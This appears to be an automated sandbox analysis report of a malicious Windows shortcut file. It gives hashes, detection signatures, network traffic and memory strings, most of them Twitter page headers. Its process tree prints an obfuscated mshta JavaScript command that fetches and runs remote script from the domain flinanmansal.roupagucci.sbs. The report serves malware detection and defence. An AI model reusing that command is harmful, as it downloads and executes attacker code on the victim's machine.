Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ProconGO1121082800.LnK.lnk

Overview

General Information

Sample name:ProconGO1121082800.LnK.lnk
Analysis ID:1431784
MD5:3849799c2978740cc3e27cc3ec5980c5
SHA1:6dfe666bdc1e961d29d56fb9754ed24590b43c8f
SHA256:a1bda78309cd02e62af859fe5171b65baa9b34861088e8c9fede648d4ef0fca4
Tags:lnk
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6440 cmdline: "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 5224 cmdline: MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Machine Learning detection for sample
Source: ProconGO1121082800.LnK.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.21.29.223:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.244.42.65 104.244.42.65
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: flinanmansal.roupagucci.sbsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.twitter.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: twitter.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: flinanmansal.roupagucci.sbsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.twitter.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: twitter.com
Source: mshta.exe, 00000003.00000003.2108977142.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: +www.twitter.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108977142.0000029E8CED2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.twitter.comGET / HTTP/1.1/ equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F36A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Location: https://www.twitter.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://api.x.ai https://api.x.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api.x.com https://api-stream.twitter.com https://api-stream.x.com https://ads-api.twitter.com https://ads-api.x.com https://aa.twitter.com https://aa.x.com https://caps.twitter.com https://caps.x.com https://pay.twitter.com https://pay.x.com https://sentry.io https://ton.twitter.com https://ton.x.com https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://twitter.com https://x.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://accounts.google.com/gsi/status https://accounts.google.com/gsi/log https://checkoutshopper-live.adyen.com wss://*.pscp.tv https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://ads-twitter.com https://analytics.twitter.com https://analytics.x.com ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com https://x.com https://*.x.com https://localhost.twitter.com:3443 https://localhost.x.com:3443; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://x.com https://mobile.twitter.com https://mobile.x.com https://pay.twitter.com https://pay.x.com https://cards-frame.twitter.com https://accounts.google.com/ https://client-api.arkoselabs.com/ https://iframe.arkoselabs.com/ https://vaultjs.apideck.com/ https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.doubleclick.net https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://scontent-sea1-1.xx.fbcdn.net https://*.googleusercontent.com https://t.co/1/i/adsct; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://x.com https://*.twimg.com https://*.vine.co https://*
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://api.x.ai https://api.x.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api.x.com https://api-stream.twitter.com https://api-stream.x.com https://ads-api.twitter.com https://ads-api.x.com https://aa.twitter.com https://aa.x.com https://caps.twitter.com https://caps.x.com https://pay.twitter.com https://pay.x.com https://sentry.io https://ton.twitter.com https://ton.x.com https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://twitter.com https://x.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://accounts.google.com/gsi/status https://accounts.google.com/gsi/log https://checkoutshopper-live.adyen.com wss://*.pscp.tv https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://ads-twitter.com https://analytics.twitter.com https://analytics.x.com ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com https://x.com https://*.x.com https://localhost.twitter.com:3443 https://localhost.x.com:3443; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://x.com https://mobile.twitter.com https://mobile.x.com https://pay.twitter.com https://pay.x.com https://cards-frame.twitter.com https://accounts.google.com/ https://client-api.arkoselabs.com/ https://iframe.arkoselabs.com/ https://vaultjs.apideck.com/ https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.doubleclick.net https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://scontent-sea1-1.xx.fbcdn.net https://*.googleusercontent.com https://t.co/1/i/adsct; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://x.com https://*.twimg.com https://*.vine.co https://*
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policyconnect-src 'self' blob: https://api.x.ai https://api.x.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api.x.com https://api-stream.twitter.com https://api-stream.x.com https://ads-api.twitter.com https://ads-api.x.com https://aa.twitter.com https://aa.x.com https://caps.twitter.com https://caps.x.com https://pay.twitter.com https://pay.x.com https://sentry.io https://ton.twitter.com https://ton.x.com https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://twitter.com https://x.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://accounts.google.com/gsi/status https://accounts.google.com/gsi/log https://checkoutshopper-live.adyen.com wss://*.pscp.tv https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://ads-twitter.com https://analytics.twitter.com https://analytics.x.com ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com https://x.com https://*.x.com https://localhost.twitter.com:3443 https://localhost.x.com:3443; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://x.com https://mobile.twitter.com https://mobile.x.com https://pay.twitter.com https://pay.x.com https://cards-frame.twitter.com https://accounts.google.com/ https://client-api.arkoselabs.com/ https://iframe.arkoselabs.com/ https://vaultjs.apideck.com/ https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.doubleclick.net https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://scontent-sea1-1.xx.fbcdn.net https://*.googleusercontent.com https://t.co/1/i/adsct; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://x.com https://*.twimg.com https://*.vine.co https://*.p
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: flinanmanhttps://www.twitter.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: flinanmanhttps://www.twitter.com( equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/ equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/0 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/8 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/@ equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/H equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/x equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https:www.twitter.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: m/ https://vaultjs.apideck.com/ https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.double' equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s1 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: twitter.comwww.twitter.comx.comwww.x.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000002.2114170575.000002A68F310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: twitter.comwww.twitter.comx.comwww.x.comV equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com3 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000002.2113778089.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108977142.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110887212.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com5 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com6 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com:443`> equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com@ equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com@ equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comM equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comP equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comU equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com[ equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comcci.sbs equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comdb equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comsbs/?1/N equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comter.com equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.comw equals www.twitter.com (Twitter)
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.twitter.com~ equals www.twitter.com (Twitter)
Source: global trafficDNS traffic detected: DNS query: flinanmansal.roupagucci.sbs
Source: global trafficDNS traffic detected: DNS query: www.twitter.com
Source: global trafficDNS traffic detected: DNS query: twitter.com
Source: mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112009127.000002A68F0DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: HTtps://flinanmansal.roupagucci.sbs/?1/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micrt.co
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abs.twimg.com/errors/logo46x38
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abs.twimg.com/errors/logo46x38.png
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/log
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/status
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/style
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ads-api.twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ads-api.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ads-twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api-stream.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api-stream.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.twitter.com
